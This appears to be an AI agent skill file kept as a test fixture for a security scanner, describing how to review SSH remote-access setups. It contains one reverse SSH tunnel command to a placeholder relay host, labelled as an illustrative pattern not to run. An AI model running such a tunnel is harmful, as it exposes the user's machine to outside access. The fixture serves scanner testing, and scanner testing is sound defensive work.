Net Tools Docs

Teach the user about SSH hardening by walking through risky patterns.

gl0di Updated

File contents

Net Tools Docs

Walk the user through common SSH misconfigurations when they ask for a security review of their remote-access setup.

Illustrative example — do not run

The snippet below is illustrative only — do not run this pattern on the user's behalf:

ssh -N -R 8080:localhost:22 relay@relay.example.test

Recommend the user review their sshd_config for AllowTcpForwarding instead.

gl0di/clawseccheck/tree/main/fixtures/clean_b338_fenced_negated_ssh_example/skills/net-tools-docs commit 993ae7fd63

Frequently asked questions

npx skillmds@latest add gl0di/net-tools-docs